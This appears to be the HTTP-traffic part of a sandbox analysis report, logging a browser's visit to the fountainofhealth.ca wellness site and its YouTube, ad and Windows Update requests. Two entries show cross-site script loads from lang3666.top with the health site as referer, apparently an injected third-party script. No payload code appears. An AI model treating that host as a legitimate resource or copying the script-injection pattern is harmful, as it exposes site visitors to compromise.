                                  Source: global trafficHTTP traffic detected: GET /themes/bootstrap/js/misc/progress.js?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /core/assets/vendor/loadjs/loadjs.min.js?v=4.2.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=6mcCVPn7U+UYE3l&MD=ceMdVNLn HTTP/1.1host: slscr.update.microsoft.comaccept: */*user-agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33accept-encoding: identity
                                  Source: global trafficHTTP traffic detected: GET /core/misc/debounce.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /core/misc/announce.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /sites/default/files/inline-images/icon-H-300_6.png HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /sites/default/files/inline-images/button-thoughts-h_1.png HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic
HTTP traffic detected: GET /lv/index.php?CYI2UINI HTTP/1.1
Host: lang3666.top
Connection: keep-alive
sec-ch-ua-platform: "Windows"
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
sec-ch-ua-mobile: ?0
Accept: */*
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: script
Sec-Fetch-Storage-Access: active
Referer: https://fountainofhealth.ca/
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: en-US,en;q=0.9
Source: global traffic
HTTP traffic detected: GET /lv/select.js?d1e20ded6adf5a3d55 HTTP/1.1
Host: lang3666.top
Connection: keep-alive
sec-ch-ua-platform: "Windows"
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
sec-ch-ua-mobile: ?0
Accept: */*
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: script
Sec-Fetch-Storage-Access: active
Referer: https://fountainofhealth.ca/
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: en-US,en;q=0.9
                                  Source: global trafficHTTP traffic detected: GET /pagead/id?slf_rd=1 HTTP/1.1host: googleads.g.doubleclick.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*origin: https://www.youtube.comx-client-data: CLf3ygE=sec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activereferer: https://www.youtube.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
                                  Source: global trafficHTTP traffic detected: GET /vi_webp/gobWGqPjLSQ/hqdefault.webp HTTP/1.1host: i.ytimg.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*x-client-data: CLf3ygE=sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
                                  Source: global trafficHTTP traffic detected: GET /ytc/AIdro_kFvgKN3sdCZkq9BPU_-UiAQV6pGa3Qxc9oGBglVNBEEA=s68-c-k-c0x00ffffff-no-rj HTTP/1.1host: yt3.ggpht.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*x-client-data: CLf3ygE=sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
                                  Source: global trafficHTTP traffic detected: GET /themes/custom/foh/images/Testimonials/doctor-21.jpg HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fountainofhealth.ca/themes/custom/foh/css/style.css?swjs7bAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /generate_204?S_CoiQ HTTP/1.1host: www.youtube.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8x-client-data: CLf3ygE=sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaXaccept-encoding: identityaccept-language: en-US,en;q=0.9cookie: YSC=gp6ufC6NPdwcookie: __Secure-ROLLOUT_TOKEN=CLLHipfu3syhbhCrlubnrLeNAxirlubnrLeNAw%3D%3Dcookie: VISITOR_INFO1_LIVE=YyBoEXXepB0cookie: VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgUA%3D%3Dpriority: i
                                  Source: global trafficHTTP traffic detected: GET /generate_204?HJMx7A HTTP/1.1host: www.youtube.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8x-client-data: CLf3ygE=sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0wsaccept-encoding: identityaccept-language: en-US,en;q=0.9cookie: YSC=gp6ufC6NPdwcookie: __Secure-ROLLOUT_TOKEN=CLLHipfu3syhbhCrlubnrLeNAxirlubnrLeNAw%3D%3Dcookie: VISITOR_INFO1_LIVE=YyBoEXXepB0cookie: VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgUA%3D%3Dpriority: i
                                  Source: global trafficHTTP traffic detected: GET /vi_webp/h15NcT6UXh0/maxresdefault.webp HTTP/1.1host: i.ytimg.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*x-client-data: CLf3ygE=sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
                                  Source: global trafficHTTP traffic detected: GET /pagead/id?slf_rd=1 HTTP/1.1host: googleads.g.doubleclick.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*origin: https://www.youtube.comx-client-data: CLf3ygE=sec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activereferer: https://www.youtube.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
                                  Source: global trafficHTTP traffic detected: GET /vi/FURi5aHgp1g/maxresdefault.jpg?sqp=-oaymwEmCIAKENAF8quKqQMa8AEB-AH-CYAC0AWKAgwIABABGH8gOChCMA8=&rs=AOn4CLCF295eNAE90ECcWgYwCgZpl6X5Wg HTTP/1.1host: i.ytimg.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*x-client-data: CLf3ygE=sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
                                  Source: global trafficHTTP traffic detected: GET /eureka/clank/134/cast_sender.js HTTP/1.1host: www.gstatic.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*x-client-data: CLf3ygE=sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://www.youtube.com/accept-encoding: identityaccept-language: en-US,en;q=0.9
                                  Source: global trafficHTTP traffic detected: GET /sites/default/files/inline-images/icons8-download-40.png HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /sites/default/files/inline-images/button-thoughts-e_1.png HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /sites/default/files/inline-images/icon-E-300_6.png HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /sites/default/files/inline-images/icons8-up-64.png HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /sites/default/files/inline-images/foh-logo%203.svg HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /sites/default/files/inline-images/youtube-t.svg HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /sites/default/files/styles/slider1/public/2023-11/Group%209826%20%281%29.png?itok=xYH_8dLj HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /sites/default/files/styles/slider1/public/2023-12/Group%209825%20%282%29.png?itok=vf0UJVIa HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /sites/default/files/inline-images/facebook-t.svg HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /sites/default/files/inline-images/Thrive_infographic_EN3%20%283%29.jpg HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /sites/default/files/FOH%20-%20Favicon.png HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /sites/default/files/inline-images/twitter-t.svg HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /themes/custom/foh/css/img/icons8-search-28.png HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /themes/custom/foh/images/Testimonials/Aging_featured-2.jpg HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /themes/custom/foh/images/Testimonials/speakers-420.jpg HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /vi_webp/h15NcT6UXh0/sddefault.webp HTTP/1.1host: i.ytimg.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8x-client-data: CLf3ygE=sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.youtube.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
                                  Source: global trafficHTTP traffic detected: GET /themes/custom/foh/images/Testimonials/doctor-21.jpg HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /sites/default/files/inline-images/wellness-app.gif HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /sites/default/files/FOH%20-%20Favicon.png HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /pagead/id?slf_rd=1 HTTP/1.1host: googleads.g.doubleclick.netuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*x-client-data: CLf3ygE=sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
                                  Source: global trafficHTTP traffic detected: GET /pagead/id?slf_rd=1 HTTP/1.1host: googleads.g.doubleclick.netuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*x-client-data: CLf3ygE=sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
                                  Source: global trafficHTTP traffic detected: GET /pagead/id?slf_rd=1 HTTP/1.1host: googleads.g.doubleclick.netuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*x-client-data: CLf3ygE=sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
